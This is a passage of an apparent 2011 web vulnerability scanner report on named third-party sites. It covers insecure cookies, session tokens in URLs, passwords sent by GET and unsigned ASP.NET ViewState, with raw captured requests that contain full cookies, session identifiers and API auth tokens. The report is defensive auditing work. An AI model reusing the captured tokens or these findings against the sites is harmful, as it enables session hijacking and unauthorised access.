<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

9.6. https://support.microsoft.com/oas/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.microsoft.com
Path:   /oas/default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: https://support.microsoft.com/oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=4Xrk9Lp8zAEkAAAAYjg5MmIyNDgtMGJjYS00OGQxLTgxZGQtNGNhNWM5NWViODEwBZINl8tYmsqgVQ-Ji-Ezy2ZuByE1; AuthKey=SMC; WFXLANG=en-us; sdninc=8; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078786002:ss=1311077969178; wedcsinc=5; fmshb=0,1311089586085

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=aHUt_bp8zAEkAAAAYjViMGEzZTItOWU1Mi00Y2VlLWE3MjEtNjY2MGIyMzIyZjYyJfMVJh6UZqW5TeDVVnL_QDHcErA1; expires=Tue, 27-Sep-2011 02:13:04 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:33:03 GMT
Content-Length: 38036

<html lang="en-US"><head><meta name="ms.gsfxversion" content="7.6.9.0" /><meta name="ms.sup_cid" content="oas" /><meta name="ms.sup_cln" content="en-us" /><meta name="ms.sup_ct" content="dm" /><meta n
...[SNIP]...

10. Session token in URL  previous  next
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://api.brightcove.com/services/library  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.brightcove.com
Path:   /services/library

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/library?command=find_video_by_id&video_id=1065857809001&callback=BCHTML5.handleVideo&media_delivery=http&token=mSs7049lqF2NZe_nAJNIDg1FQDco9YtZEk8YfbwYAEo.&video_fields=id,name,shortDescription,linkURL,linkText,thumbnailURL,videoStillURL,renditions,FLVURL&_=1311108201830 HTTP/1.1
Host: api.brightcove.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Tue, 19 Jul 2011 16:38:49 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 2773
Date: Tue, 19 Jul 2011 20:43:16 GMT
Server:

BCHTML5.handleVideo({"id":1065857809001,"name":"Not counting calories","shortDescription":"(Boston Globe) In today's Big Story, Kay Lazar has the results of a new study that says calorie information i
...[SNIP]...

10.2. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1311082869251&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1311082691897& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M002304
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:33:44 GMT
Content-Length: 155

LogCredCB1311082691897({"sessionId" : "AkTQo3bd59vuEUXkzSEUoUXzjq0aKILJmxS14wthghRypWy4debLAboh77ZwaezU", "authenticationResultCode" : "ValidCredentials"})

10.3. http://digg.com/ajax/tooltip/submit  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ajax/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19213 10.2.129.145
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Content-Type: application/json
Content-Length: 759

{"event":"digg:tooltip","data":{"html":"<div class=\"tooltip \">\n <div class=\"tooltip-pointer\"><\/div>\n <a class=\"close-it tooltip-dismiss\"><span>x<\/span><\/a>\n <p class=\"tooltip-hea
...[SNIP]...

10.4. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&hostname=www.factset.com&location=%2Fproducts%2Fim&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&sessionID=1311085609430.33334&fpc=301c176-13142cac1d6-364e5fca-1&ts1311085610124.0&refDomain=www.fakereferrerdominator.com&refQuery=RefParName%3DRefValue HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 14:26:43 GMT
Connection: keep-alive


10.5. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://realnetworksrealarca.tt.omtrdc.net
Path:   /m2/realnetworksrealarca/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:48 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 1402
Date: Tue, 19 Jul 2011 20:25:48 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('gh-global',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-gh-glo
...[SNIP]...

10.6. http://sales.liveperson.net/hc/21661174/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/21661174/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/21661174/?&visitor=16101514677756&msessionkey=5504769704751670663&site=21661174&cmd=mTagStartPage&lpCallId=745677900034-84418076789&protV=20&lpjson=1&page=http%3A//support.microsoft.com/contactus/&id=8564492554&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-NA.EN.CS.CON.PSTSLS.GENERAL&activePlugin=none&cobrowse=true&PV%21unit=NA.EN.CS.CON.PSTSLS.GENERAL&PV%21pageLoadTime=6%20sec&PV%21visitorActive=1&SV%21ExternalID=Chat1311088769136&SV%21langSelection=en-us&title=Help%20and%20Support&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQTRSRBT=BCEBMKKDBBGCPDLELDBDMCBE

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_21661174=STANDALONE; path=/hc/21661174
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Jul 2011 15:19:33 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"745677900034-84418076789","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

10.7. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://stubhub.tt.omtrdc.net
Path:   /m2/stubhub/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=1&pageType=BrowseTicketDetail&section=Concert%20tickets&mbox_channelId=1&mbox_genre_grand_parent_id=63914&mbox_genre_parent=602&mbox_event_id=906484&mbox=Global&mboxId=0&mboxTime=1311082546212&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: Test & Target

mboxFactories.get('default').get('Global',0).setOffer(new mboxOfferDefault()).loaded();

10.8. http://wd.sharethis.com/api/sharer.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/sharer.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /api/sharer.php?destination=stumbleupon&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private%20Equity%2C%20Venture%20Capital%2C%20Ownership%2C%20M%26A%2C%20Idea%20Screening%2C%20Reporting%20%7C%20FactSet%20Research%20Systems&publisher=f182be89-e43d-46bc-88dd-05fd82e682c0&fpc=301c176-13142cac1d6-364e5fca-2&sessionID=1311085619964.89430&source=chicklet&service=legacy&type=null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Tue, 19 Jul 2011 14:28:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
Content-Length: 0


10.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_06_0_993063%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_06_0_993063&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_06_0_993063&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.34
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0


11. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


11.1. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.2. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">
<!-- Methode uuid: "b12c8144-b20e-11e0-aa83-a59fd6e1b552" -->
<head>
<title
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

12. ASP.NET ViewState without MAC enabled  previous  next
There are 11 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


12.1. http://umfcluj.ro/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /

Request

GET / HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:02 GMT
Content-Length: 38701


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.2. http://umfcluj.ro/Detaliu.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://umfcluj.ro
Path:   /Detaliu.aspx

Request

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala HTTP/1.1
Host: umfcluj.ro
